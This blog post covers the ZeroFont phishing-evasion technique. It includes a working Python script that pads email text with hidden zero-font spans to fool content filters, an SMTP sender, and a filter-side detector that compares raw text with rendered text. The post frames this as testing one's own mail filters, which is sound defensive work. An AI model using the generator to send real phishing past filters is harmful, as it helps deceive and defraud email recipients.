Sunday, September 30, 2018

ZeroFont Vulnerability Testing and PoC - Updated

Recently a friend of mine published an article called "The ZeroFont Exploit Continues". He referenced a link at the following location: http://www.avanan.com/resources/zerofont-phishing-attack. The technique pads a phishing message with runs of random characters wrapped in spans styled with a font size of zero, so the text a mail filter scans is gibberish while the text the recipient sees is unchanged. From this research I tested whether I could send a similar email to myself. Though I did not formulate a phishing email, I used the above tactics to send a message, and it went through.

Below are the scripts I used to test how "The ZeroFont Exploit Continues".


---
Script to generate the ZeroFont message
---
#!/usr/bin/env python3

# Leave the first 50 characters of the message untouched (no zero-font spans).
# Leave anything inside an HTML tag (for example a link) intact.
# Reads message.txt and writes the HTML to stdout; save it as the file 't'
# that the send script below reads:  python3 zerofont.py > t

import random

alphabet = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'
messageSpacing = 50  # How many characters from the beginning to leave unencoded
newMessage = ''
with open('message.txt', 'r') as f:
    for line in f:
        letterCount = 0
        counter = random.randint(1, 4)  # visible letters between hidden spans
        htmlChar = False                # True while inside a <...> tag
        for letter in line.rstrip('\n'):
            newMessage += letter
            if letter == '<':
                htmlChar = True
                letterCount += 1
                messageSpacing -= 1
            elif letter == '>':
                htmlChar = False
                letterCount += 1
                messageSpacing -= 1
            elif not htmlChar:
                if messageSpacing > 0:
                    messageSpacing -= 1
                elif letterCount >= counter:
                    letterCount = 0
                    counter = random.randint(1, 4)
                elif letterCount == 1:
                    # Insert 3-12 random characters that render invisibly,
                    # splitting the visible word for any keyword scanner
                    randStr = ''.join(random.choice(alphabet)
                                      for _ in range(random.randint(3, 12)))
                    # Earlier variant: '<span style="FONT-SIZE: 0px">' + randStr + '</span>'
                    newMessage += '<span style="font-size:0px;color:transparent">' + randStr + '</span>'
                    letterCount += 1
                else:
                    letterCount += 1
        newMessage += '<br />'

print("<html><body>")
print(newMessage)
print("</body></html>")

---
Script to send the Email
---

#!/usr/bin/env python3

import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.base import MIMEBase
from email import encoders

fromAddress = 'from_email'
toAddress = 'to_email'

# 'mixed' is the right container for a body plus a file attachment;
# 'alternative' is for different renderings of the same body.
msg = MIMEMultipart('mixed')
msg['Subject'] = "ZeroFont Exploit"
msg['From'] = fromAddress
msg['To'] = toAddress

# Attach the HTML message produced by the generator script (saved as 't')
htmlMsg = ''
with open('t', 'r') as f:
    for line in f:
        htmlMsg += line.strip()
htmlPart = MIMEText(htmlMsg, 'html')
msg.attach(htmlPart)

# Attach a file as a generic binary attachment
with open('script', 'rb') as f:
    filePart = MIMEBase('application', 'octet-stream')
    filePart.set_payload(f.read())
encoders.encode_base64(filePart)
filePart.add_header('Content-Disposition', 'attachment; filename="script"')
msg.attach(filePart)

username = 'username'
password = 'password'

server = smtplib.SMTP('smtp.server.com', 1527)
server.starttls()
server.login(username, password)
server.sendmail(fromAddress, toAddress, msg.as_string())
server.quit()




These scripts are meant to help security researchers test whether their own email filters are fooled by this technique, which phishing emails are already using in the wild: if the generated message reaches the inbox, the filter is scoring the padded text rather than the text the user reads.
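As an added example (not code from the original post or from the Avanan write-up), here is the filter-side counterpart to the generator above: a small Python 3 parser that computes both the text a naive scanner sees and the text the recipient actually sees, then runs the same keyword check against each. The styles it treats as hiding text (a zero font-size and color:transparent, the two the generator emits), the regexes, the phrase list and the sample message are all constructed for this example.

```python
#!/usr/bin/env python3
# Filter-side check for ZeroFont padding: compare what a naive scanner sees
# with what the recipient sees.  Added example, not code from the post.
import re
from html.parser import HTMLParser

# Inline-style patterns that render text invisibly.  Constructed for this
# example: a zero font-size in any unit/case, and a transparent text colour.
ZERO_FONT_RE = re.compile(
    r"(?<![\w-])font-size\s*:\s*0+(?:\.0+)?(?:px|pt|em|rem|%)?\s*(?:;|!|$)", re.I)
TRANSPARENT_RE = re.compile(r"(?<![\w-])color\s*:\s*transparent\b", re.I)

VOID_TAGS = {"br", "img", "hr", "input", "meta", "link"}  # never closed


def style_hides_text(style):
    """True if an inline style attribute would make the element's text invisible."""
    if not style:
        return False
    return bool(ZERO_FONT_RE.search(style) or TRANSPARENT_RE.search(style))


class ZeroFontExtractor(HTMLParser):
    """Collect the raw text (what a naive filter scans) and the visible text
    (what the recipient reads), tracking nested elements that hide text."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.raw_parts = []
        self.visible_parts = []
        self.stack = []          # one bool per open element: does it hide text?
        self.hidden_depth = 0    # number of currently open hiding elements
        self.hidden_chars = 0

    def handle_starttag(self, tag, attrs):
        if tag in VOID_TAGS:     # <br /> from the generator becomes a newline
            if tag == "br":
                self.raw_parts.append("\n")
                self.visible_parts.append("\n")
            return
        hides = style_hides_text(dict(attrs).get("style"))
        self.stack.append(hides)
        if hides:
            self.hidden_depth += 1

    def handle_endtag(self, tag):
        if tag in VOID_TAGS or not self.stack:
            return
        if self.stack.pop():
            self.hidden_depth -= 1

    def handle_data(self, data):
        self.raw_parts.append(data)          # naive filter scans everything
        if self.hidden_depth:
            self.hidden_chars += len(data)   # recipient never sees this
        else:
            self.visible_parts.append(data)


def split_visible_hidden(html):
    """Return (naive_text, rendered_text, hidden_char_count) for an HTML body."""
    p = ZeroFontExtractor()
    p.feed(html)
    p.close()
    return "".join(p.raw_parts), "".join(p.visible_parts), p.hidden_chars


PHISHING_PHRASES = ("verify your account", "update your password")  # example list


def phrase_hits(text):
    """Phrases found after collapsing whitespace and case."""
    norm = " ".join(text.lower().split())
    return [p for p in PHISHING_PHRASES if p in norm]


def analyze(html):
    """Score the same body both ways so the difference is visible."""
    raw, visible, hidden = split_visible_hidden(html)
    return {
        "naive_text": raw,
        "rendered_text": visible,
        "hidden_chars": hidden,
        "naive_hits": phrase_hits(raw),
        "rendered_hits": phrase_hits(visible),
    }


# Constructed sample in the shape the generator script produces: junk inside
# zero-font spans, the link left intact, <br /> at the end of the line.
SAMPLE = (
    '<html><body>Your mailbox is almost full. Please ve'
    '<span style="font-size:0px;color:transparent">Qx7mA</span>rify your '
    'acc<span style="FONT-SIZE: 0px">bZt</span>ount at '
    '<a href="http://example.com/login">this link</a> today.<br /></body></html>'
)

if __name__ == "__main__":
    result = analyze(SAMPLE)
    for key in ("naive_text", "rendered_text", "hidden_chars",
                "naive_hits", "rendered_hits"):
        print(f"{key:14}: {result[key]!r}")
```

Running it shows the naive view of the body matching none of the phrases while the rendered view matches "verify your account": a filter has to apply the hiding rules before it tokenises, or it is scoring a different message than the one the user reads. Real phishing bodies also use display:none, visibility:hidden, white-on-white text and rules in a <style> block, none of which this example covers.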
